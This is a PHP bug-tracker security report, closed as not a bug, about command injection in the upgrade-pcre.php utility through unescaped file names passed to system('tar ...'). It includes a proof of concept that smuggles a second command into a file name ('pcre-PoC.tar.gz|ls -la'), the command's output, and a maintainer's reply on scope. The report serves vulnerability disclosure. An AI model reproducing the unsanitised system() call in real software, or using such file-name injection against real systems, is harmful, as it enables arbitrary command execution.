php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #55611 command injection
Submitted: 2011-09-05 18:05 UTC Modified: 2011-09-06 04:51 UTC
From: thinhhq at vng dot com dot vn Assigned:
Status: Not a bug Package: Unknown/Other Function
PHP Version: 5.3.8 OS: linux, unix
Private report: No CVE-ID: None
 [2011-09-05 18:05 UTC] thinhhq at vng dot com dot vn
Description:
------------
Description:
Command injection flaw found in /php-5.3.8/ext/pcre/upgrade-pcre.php:
-----snip snip ------
$pattern = 'pcre-*.tar.*';
$newpcre = glob($pattern);
if (count($newpcre) > 1) {
	echo "more than one '$pattern' file. aborting\n";
	print_r($newpcre);
	exit;}
if (count($newpcre) == 0) {
	die("need one '$pattern' file. aborting.\n");
}
$newpcre = $newpcre[0];
if (strpos($newpcre, 'gz')) {
	system("tar xfz $newpcre"); //command injection
} elseif (strpos($newpcre, 'bz2')) {
	system("tar xfj $newpcre");//command injection
} else {
	die("file type not recognized: $newpcre\n");

-----snip snip ------

Test script:
---------------
PoC:
$touch "pcre-PoC.tar.gz|ls -la"
$ php upgrade-pcre.php 
tar: pcre-PoC.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
total 100
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-09-05 12:37 .
drwxr-xr-x 79 g4mm4 g4mm4  4096 2011-08-23 05:33 ..
-rw-r--r--  1 g4mm4 g4mm4  2764 2009-08-11 17:40 config0.m4
-rw-r--r--  1 g4mm4 g4mm4   714 2010-12-13 13:43 config.w32
-rw-r--r--  1 g4mm4 g4mm4    40 2007-09-26 11:44 CREDITS
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-08-23 05:32 pcrelib
-rw-r--r--  1 g4mm4 g4mm4     0 2011-09-05 12:37 pcre-PoC.tar.gz|ls -la
-rw-r--r--  1 g4mm4 g4mm4 59989 2011-08-05 18:39 php_pcre.c
-rw-r--r--  1 g4mm4 g4mm4   212 2009-01-11 08:59 php_pcre.def
-rw-r--r--  1 g4mm4 g4mm4  3280 2010-12-31 21:19 php_pcre.h
drwxr-xr-x  2 g4mm4 g4mm4  4096 2011-08-23 05:32 tests
-rw-r--r--  1 g4mm4 g4mm4  2876 2011-05-13 03:00 upgrade-pcre.php
processing pcrelib/AUTHORS... pcre-PoC/AUTHORS is not available any more


Expected result:
----------------
$ php upgrade-pcre.php

gzip: stdin: unexpected end of file
tar: Child returned status 1
tar: Exiting with failure status due to previous errors
processing pcrelib/AUTHORS... pcre-dsada/AUTHORS is not available any more


Actual result:
--------------
tar: pcre-PoC.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
total 100
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-09-05 12:37 .
drwxr-xr-x 79 g4mm4 g4mm4  4096 2011-08-23 05:33 ..
-rw-r--r--  1 g4mm4 g4mm4  2764 2009-08-11 17:40 config0.m4
-rw-r--r--  1 g4mm4 g4mm4   714 2010-12-13 13:43 config.w32
-rw-r--r--  1 g4mm4 g4mm4    40 2007-09-26 11:44 CREDITS
drwxr-xr-x  4 g4mm4 g4mm4  4096 2011-08-23 05:32 pcrelib
-rw-r--r--  1 g4mm4 g4mm4     0 2011-09-05 12:37 pcre-PoC.tar.gz|ls -la
-rw-r--r--  1 g4mm4 g4mm4 59989 2011-08-05 18:39 php_pcre.c
-rw-r--r--  1 g4mm4 g4mm4   212 2009-01-11 08:59 php_pcre.def
-rw-r--r--  1 g4mm4 g4mm4  3280 2010-12-31 21:19 php_pcre.h
drwxr-xr-x  2 g4mm4 g4mm4  4096 2011-08-23 05:32 tests
-rw-r--r--  1 g4mm4 g4mm4  2876 2011-05-13 03:00 upgrade-pcre.php
processing pcrelib/AUTHORS... pcre-PoC/AUTHORS is not available any more


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2011-09-05 18:29 UTC] scottmac@php.net
-Status: Open +Status: Bogus
 [2011-09-05 18:29 UTC] scottmac@php.net
this is a utility script for PHP devleopers to update the bundled PCRE. If you 
can write to my filesystem then I think there are bigger problems, could you add 
a new *.c file?
 [2011-09-06 04:37 UTC] thinhhq at vng dot com dot vn
Hi Scott,
I think its seriously a bug when i read the comment in file source:
$ more -4 upgrade-pcre.php
<?php
// script to upgrade PCRE. just drop the pcre-x.x.tar.xx here and run the script
...
...
Maybe, pcre-x.x.tar.xx can downloadable everywhere from unknow sources???After that, sysadmin just think they are decompressing pcre-x.x.tar :).
Regards
--Thinhhq
 [2011-09-06 04:51 UTC] scottmac@php.net
This isn't for sysadmins. This is for PHP core contributors who are upgrading 
PCRE for the bundled release. I'll update the comment next time I run the script 
and upgrade PCRE.

At the moment its about 4 people who use this script before committing the 
results.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Dec 26 11:01:30 2024 UTC